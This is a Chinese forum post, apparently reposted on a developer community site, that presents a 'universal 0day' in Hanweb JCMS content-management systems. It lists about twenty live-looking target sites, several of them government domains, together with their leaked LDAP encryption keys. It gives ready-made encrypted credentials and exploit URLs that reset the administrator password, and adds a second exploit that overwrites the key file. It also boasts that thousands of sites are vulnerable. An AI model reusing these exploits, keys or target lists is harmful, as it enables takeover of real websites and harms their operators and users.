乌云最新曝光的大汉网络通杀0day漏洞分享

本贴最后更新于 3394 天前,其中的信息可能已经时异事殊

第一步,大汉网络加解密说明

LDAP密钥配置文件,/interface/ldap/ldapconf.xml

获取密钥:<enckey>o3h2iB8ggnp2</enckey>

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

我们可以使用大汉的加解密库进行任意加解密,只要知道服务端的密钥,就可以和服务器进行通讯:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

第二步,保存密钥的ldapconf.xml文件,放在了网站目录,直接可以访问:

code 区域
 (很简单就找到了很多密钥)http://122.224.183.4:80/jcms/interface/ldap/ldapconf.xml [123123] http://221.231.137.195/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://202.108.199.114:80/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://202.108.199.114/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://6bur.cscec.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://cengangpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://219.146.58.42/jcms/interface/ldap/ldapconf.xml [123123] http://cq.ea-spring.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://caiyuan.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://bingmei.sdcdc.cn/jcms/interface/ldap/ldapconf.xml [uhfuXyOav5pK8hil] http://3bur.cscec.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://csbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://changspcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://blbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://cz.anxiang.gov.cn/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://chart.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml [t0NN3oslN3OW] http://chengdpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://bj.clubchinachic.com/jcms/interface/ldap/ldapconf.xml [o3h2iB8ggnp2] http://dandong.xiangshan.gov.cn/jcms/interface/ldap/ldapconf.xml [123123] http://dayupcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://chdj.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml [t0NN3oslN3OW]

我们拿官网,进行一下测试:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

访问:http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml

拿到了密钥:<enckey>OJ9Un5JmpTfN0gJx</enckey>

第三步,通过密钥: OJ9Un5JmpTfN0gJx,我们构造如下几个密文:

code 区域

encrypt : e2V1Z3UdA2sNaw==

decrypt : admin

encrypt : DEIBRXBGcUQOM3g0

decrypt : 123456

第四步,覆盖管理员密码为:admin - 123456

漏洞EXP:

http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2V1Z3UdA2sNaw==&loginpass=DEIBRXBGcUQOM3g0

直接登录,自动跳转到登录后台,进入后台Getshell的文章很多啦:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

漏洞分析:

code 区域

组件功能:

/interface/ldap/receive.jsp这个组件,是一个不同大汉系统间,同步用户的通用组件。

例如:jact系统,需要把jcms用户同步到自己的系统中。

这个组件本来就是,用于创建用户的,如果被创建的用户存在的话,就会进行更新操作,在这里直接我管理员的密码,进行了重置。分析一下参数:

loginuser=e2V1Z3UdA2sNaw==

loginpass=DEIBRXBGcUQOM3g0

就是加密后的 admin - 123456,将管理员的密码覆盖了。

源码分析:

code 区域
# \interface\ldap\receive.jsp    // 获取参数   String loginuser = Convert.getParameter(request,"loginuser", "", true, true);    //用户名   String loginpass = Convert.getParameter(request,"loginpass", "", true, true);    //密码    // 创建用户对象   Merp_Pub_UserEntity entity = new Merp_Pub_UserEntity();   entity.setVc_loginid(loginuser);   entity.setVc_password(loginpass);    // 验证用户是否合法   ldapBlf.checkValidate(entity);  # 反编译 jcms.blf.user.LdapBLF.java    // 对于传递进来的参数,进行了解密   vc_loginid = decrypt(vc_loginid, this.encrypttype);   vc_pwd = decrypt(vc_pwd, this.encrypttype);   // 对解密后的用户信息,插入或更新数据库信息   insertOrUpdateUser(ldapEn, groupid, 0);

漏洞证明:


新的姿势:

上面提交的重置管理员密码漏洞,是因为ldap密钥泄漏。

/interface/ldap/ldapconf.xml,直接放到了网站目录中,可以直接访问。

我在对官方demo最新版本的测试中,/interface/ldap/ldapconf.xml是无法访问的。

这样就看不到明文的密钥了,所以无法重置管理员密码了。

官方demo:http://demo.hanweb.com/jcms/

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

于是我又深入分析了一下,/interface/ldap/receive.jsp这个组件,发现一个惊喜。

code 区域
if (state.equals("S")) {    //注册应用    boolean b = ldapBlf.writeXML(appname,enckey,ldapurl,webtype,ssourl,encrypttype); }

原来这个xml的配置文件,是可以覆盖的,所以构造EXP:

http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=S&enckey=key888

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

code 区域
构造加解密字符串:enckey  : key888 encrypt : BWcCb3FrBBh8bQ== decrypt : admin 覆盖管理员密码为:admin - admin

漏洞EXP:

http://demo.hanweb.com/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=BWcCb3FrBBh8bQ==&loginpass=BWcCb3FrBBh8bQ==

再一次,成功登陆:

乌云最新曝光的大汉网络通杀0day漏洞分享-安全盒子

影响范围:

通过上面两种姿势,新旧版本全系统全版本保证通杀,包括:jcms,jact,jsearch,vipchat,vc,xxgk等等。

轻轻松松几千个站点,上面已经列了一些,不够的话我补充。


  • B3log

    B3log 是一个开源组织,名字来源于“Bulletin Board Blog”缩写,目标是将独立博客与论坛结合,形成一种新的网络社区体验,详细请看 B3log 构思。目前 B3log 已经开源了多款产品:SymSoloVditor思源笔记

    1062 引用 • 3455 回帖 • 147 关注

相关帖子

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...

推荐标签 标签

  • Quicker

    Quicker 您的指尖工具箱!操作更少,收获更多!

    38 引用 • 158 回帖
  • gRpc
    11 引用 • 9 回帖 • 103 关注
  • App

    App(应用程序,Application 的缩写)一般指手机软件。

    91 引用 • 384 回帖 • 1 关注
  • Google

    Google(Google Inc.,NASDAQ:GOOG)是一家美国上市公司(公有股份公司),于 1998 年 9 月 7 日以私有股份公司的形式创立,设计并管理一个互联网搜索引擎。Google 公司的总部称作“Googleplex”,它位于加利福尼亚山景城。Google 目前被公认为是全球规模最大的搜索引擎,它提供了简单易用的免费服务。不作恶(Don't be evil)是谷歌公司的一项非正式的公司口号。

    49 引用 • 192 回帖
  • Dubbo

    Dubbo 是一个分布式服务框架,致力于提供高性能和透明化的 RPC 远程服务调用方案,是 [阿里巴巴] SOA 服务化治理方案的核心框架,每天为 2,000+ 个服务提供 3,000,000,000+ 次访问量支持,并被广泛应用于阿里巴巴集团的各成员站点。

    60 引用 • 82 回帖 • 621 关注
  • jsoup

    jsoup 是一款 Java 的 HTML 解析器,可直接解析某个 URL 地址、HTML 文本内容。它提供了一套非常省力的 API,可通过 DOM,CSS 以及类似于 jQuery 的操作方法来取出和操作数据。

    6 引用 • 1 回帖 • 505 关注
  • IPFS

    IPFS(InterPlanetary File System,星际文件系统)是永久的、去中心化保存和共享文件的方法,这是一种内容可寻址、版本化、点对点超媒体的分布式协议。请浏览 IPFS 入门笔记了解更多细节。

    20 引用 • 245 回帖 • 240 关注
  • 自由行
    1 关注
  • sts
    2 引用 • 2 回帖 • 247 关注
  • BND

    BND(Baidu Netdisk Downloader)是一款图形界面的百度网盘不限速下载器,支持 Windows、Linux 和 Mac,详细介绍请看这里

    107 引用 • 1281 回帖 • 40 关注
  • etcd

    etcd 是一个分布式、高可用的 key-value 数据存储,专门用于在分布式系统中保存关键数据。

    6 引用 • 26 回帖 • 545 关注
  • SEO

    发布对别人有帮助的原创内容是最好的 SEO 方式。

    36 引用 • 200 回帖 • 40 关注
  • Webswing

    Webswing 是一个能将任何 Swing 应用通过纯 HTML5 运行在浏览器中的 Web 服务器,详细介绍请看 将 Java Swing 应用变成 Web 应用

    1 引用 • 15 回帖 • 649 关注
  • 小说

    小说是以刻画人物形象为中心,通过完整的故事情节和环境描写来反映社会生活的文学体裁。

    32 引用 • 108 回帖
  • OneNote
    1 引用 • 3 回帖 • 1 关注
  • 阿里巴巴

    阿里巴巴网络技术有限公司(简称:阿里巴巴集团)是以曾担任英语教师的马云为首的 18 人,于 1999 年在中国杭州创立,他们相信互联网能够创造公平的竞争环境,让小企业通过创新与科技扩展业务,并在参与国内或全球市场竞争时处于更有利的位置。

    43 引用 • 221 回帖 • 45 关注
  • Electron

    Electron 基于 Chromium 和 Node.js,让你可以使用 HTML、CSS 和 JavaScript 构建应用。它是一个由 GitHub 及众多贡献者组成的活跃社区共同维护的开源项目,兼容 Mac、Windows 和 Linux,它构建的应用可在这三个操作系统上面运行。

    15 引用 • 136 回帖 • 4 关注
  • 招聘

    哪里都缺人,哪里都不缺人。

    188 引用 • 1057 回帖
  • VirtualBox

    VirtualBox 是一款开源虚拟机软件,最早由德国 Innotek 公司开发,由 Sun Microsystems 公司出品的软件,使用 Qt 编写,在 Sun 被 Oracle 收购后正式更名成 Oracle VM VirtualBox。

    10 引用 • 2 回帖 • 15 关注
  • Solidity

    Solidity 是一种智能合约高级语言,运行在 [以太坊] 虚拟机(EVM)之上。它的语法接近于 JavaScript,是一种面向对象的语言。

    3 引用 • 18 回帖 • 451 关注
  • 创造

    你创造的作品可能会帮助到很多人,如果是开源项目的话就更赞了!

    187 引用 • 1021 回帖
  • Love2D

    Love2D 是一个开源的, 跨平台的 2D 游戏引擎。使用纯 Lua 脚本来进行游戏开发。目前支持的平台有 Windows, Mac OS X, Linux, Android 和 iOS。

    14 引用 • 53 回帖 • 563 关注
  • 设计模式

    设计模式(Design pattern)代表了最佳的实践,通常被有经验的面向对象的软件开发人员所采用。设计模式是软件开发人员在软件开发过程中面临的一般问题的解决方案。这些解决方案是众多软件开发人员经过相当长的一段时间的试验和错误总结出来的。

    201 引用 • 120 回帖
  • Bug

    Bug 本意是指臭虫、缺陷、损坏、犯贫、窃听器、小虫等。现在人们把在程序中一些缺陷或问题统称为 bug(漏洞)。

    76 引用 • 1742 回帖
  • 尊园地产

    昆明尊园房地产经纪有限公司,即:Kunming Zunyuan Property Agency Company Limited(简称“尊园地产”)于 2007 年 6 月开始筹备,2007 年 8 月 18 日正式成立,注册资本 200 万元,公司性质为股份经纪有限公司,主营业务为:代租、代售、代办产权过户、办理银行按揭、担保、抵押、评估等。

    1 引用 • 22 回帖 • 808 关注
  • 旅游

    希望你我能在旅途中找到人生的下一站。

    101 引用 • 905 回帖 • 2 关注
  • GAE

    Google App Engine(GAE)是 Google 管理的数据中心中用于 WEB 应用程序的开发和托管的平台。2008 年 4 月 发布第一个测试版本。目前支持 Python、Java 和 Go 开发部署。全球已有数十万的开发者在其上开发了众多的应用。

    14 引用 • 42 回帖 • 831 关注